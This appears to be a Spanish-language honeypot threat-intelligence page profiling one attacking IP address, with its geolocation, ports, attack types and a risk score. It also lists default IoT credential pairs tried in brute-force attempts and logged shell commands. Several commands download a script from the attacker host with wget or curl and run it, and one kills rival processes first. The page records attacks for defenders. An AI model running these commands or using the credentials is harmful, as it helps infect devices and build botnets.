Amenaza Activa • CRITICO
130.12.180.80
🎯
3441
Ataques Totales
🔌
9
Puertos
📡
5
Tipos Ataque
🦠
2
Malware
Geolocalizacion
- Pais
- 🇺🇸 Estados Unidos
- Ciudad
- Desconocida
- ASN
- AS214943
- ISP
- Railnet LLC
Tipos de Ataque
tanner
adbhoney
honeytrap
cowrie
honeyaml
Puertos Atacados
5511222280560805555555622235558
Malware Asociado
Credenciales Intentadas
🔐 root/root (14x)
🔐 root/(vacio) (13x)
🔐 admin/admin (9x)
🔐 user/user (8x)
🔐 telecomadmin/admintelecom (7x)
🔐 root/xc3511 (7x)
🔐 root/password (5x)
🔐 ubnt/ubnt (5x)
🔐 hikvision/hikvision (5x)
🔐 root/123456 (4x)
🔐 pi/raspberry (3x)
🔐 admin/password (3x)
🔐 user/password (3x)
🔐 root/vizxv (3x)
🔐 ftp/ftp (3x)
Comandos Ejecutados
$ cd /data/local/tmp; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android (445x)
$ cd /data/local; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android (133x)
$ echo hello (56x)
$ cd /data/local/tmp; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android (52x)
$ for pid in /proc/[0-9]*; do pid_num="${pid##*/}"; if [ -r "$pid/maps" ]; then suspicious=true; while IFS= read -r line; do case "$line" in *"/lib/"*|*"/lib64/"*|*".so"*) suspicious=false; break;; esac; done < "$pid/maps"; if [ "$suspicious" = true ]; then kill -9 "$pid_num"; fi; fi; done; cd /data/local/tmp; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android (41x)
$ ./ (26x)
$ cd /data/local/tmp; rm *; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; ./cat.sh android (24x)
$ cat /proc (13x)
$ echo SHELL_TEST (13x)
$ /bin/busybox TEST (13x)
Evaluacion de Riesgo
80/100
Bajo · Medio · Alto · Critico